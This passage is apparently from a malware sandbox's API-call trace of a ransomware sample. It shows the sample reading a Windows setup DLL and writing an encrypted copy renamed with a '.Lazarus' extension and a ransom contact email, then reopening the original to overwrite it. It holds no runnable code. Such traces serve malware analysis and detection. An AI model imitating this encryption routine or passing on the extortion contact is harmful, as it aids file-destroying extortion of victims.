lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d780 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.419] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.419] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.419] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0061.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0061.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0061.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0061.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0061.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0061.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0061.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.420] AreFileApisANSI () returned 1 [0061.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0061.421] AreFileApisANSI () returned 1 [0061.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0061.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 46 [0061.421] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.421] GetFileType (hFile=0x428) returned 0x1 [0061.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.421] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0061.421] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0061.421] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0061.421] CloseHandle (hObject=0x428) returned 1 [0061.422] AreFileApisANSI () returned 1 [0061.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0061.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 46 [0061.422] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.422] GetFileType (hFile=0x428) returned 0x1 [0061.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.422] CloseHandle (hObject=0x428) returned 1 [0061.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.423] AreFileApisANSI () returned 1 [0061.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0061.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 46 [0061.423] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758)) returned 1 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.423] AreFileApisANSI () returned 1 [0061.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.423] GetLastError () returned 0x0 [0061.423] SetLastError (dwErrCode=0x0) [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0061.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8a210 [0061.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0061.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0061.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d720 [0061.424] GetLastError () returned 0x0 [0061.424] SetLastError (dwErrCode=0x0) [0061.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71a30 [0061.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0061.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0061.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.424] AreFileApisANSI () returned 1 [0061.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0061.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0061.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0061.425] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.425] GetFileType (hFile=0x428) returned 0x1 [0061.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0061.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0061.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0061.425] AreFileApisANSI () returned 1 [0061.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0061.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 46 [0061.425] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.425] GetFileType (hFile=0x420) returned 0x1 [0061.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0061.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.426] GetLastError () returned 0x0 [0061.426] SetLastError (dwErrCode=0x0) [0061.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.426] GetLastError () returned 0x0 [0061.426] SetLastError (dwErrCode=0x0) [0061.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0061.426] ReadFile (in: hFile=0x420, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0061.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0061.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0061.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0061.428] GetLastError () returned 0x0 [0061.428] SetLastError (dwErrCode=0x0) [0061.429] GetLastError () returned 0x0 [0061.429] SetLastError (dwErrCode=0x0) [0061.429] GetLastError () returned 0x0 [0061.429] SetLastError (dwErrCode=0x0) [0061.429] GetLastError () returned 0x0 [0061.429] SetLastError (dwErrCode=0x0) [0061.429] ReadFile (in: hFile=0x420, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.521] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.522] GetLastError () returned 0x0 [0061.522] SetLastError (dwErrCode=0x0) [0061.522] GetLastError () returned 0x0 [0061.522] SetLastError (dwErrCode=0x0) [0061.522] GetLastError () returned 0x0 [0061.522] SetLastError (dwErrCode=0x0) [0061.522] GetLastError () returned 0x0 [0061.522] SetLastError (dwErrCode=0x0) [0061.523] ReadFile (in: hFile=0x420, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.523] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.523] GetLastError () returned 0x0 [0061.523] SetLastError (dwErrCode=0x0) [0061.523] GetLastError () returned 0x0 [0061.523] SetLastError (dwErrCode=0x0) [0061.523] GetLastError () returned 0x0 [0061.523] SetLastError (dwErrCode=0x0) [0061.523] GetLastError () returned 0x0 [0061.523] SetLastError (dwErrCode=0x0) [0061.523] ReadFile (in: hFile=0x420, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x758, lpOverlapped=0x0) returned 1 [0061.524] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.524] GetLastError () returned 0x0 [0061.524] SetLastError (dwErrCode=0x0) [0061.524] ReadFile (in: hFile=0x420, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0061.524] GetLastError () returned 0x0 [0061.524] SetLastError (dwErrCode=0x0) [0061.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0061.524] GetLastError () returned 0x0 [0061.524] SetLastError (dwErrCode=0x0) [0061.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0061.524] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0x760, lpOverlapped=0x0) returned 1 [0061.525] GetLastError () returned 0x0 [0061.525] SetLastError (dwErrCode=0x0) [0061.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.525] GetLastError () returned 0x0 [0061.525] SetLastError (dwErrCode=0x0) [0061.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0061.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0061.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0061.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.525] CloseHandle (hObject=0x428) returned 1 [0061.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0061.526] CloseHandle (hObject=0x420) returned 1 [0061.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0061.526] AreFileApisANSI () returned 1 [0061.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0061.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 46 [0061.527] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.528] GetFileType (hFile=0x420) returned 0x1 [0061.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0061.528] GetLastError () returned 0xb7 [0061.528] SetLastError 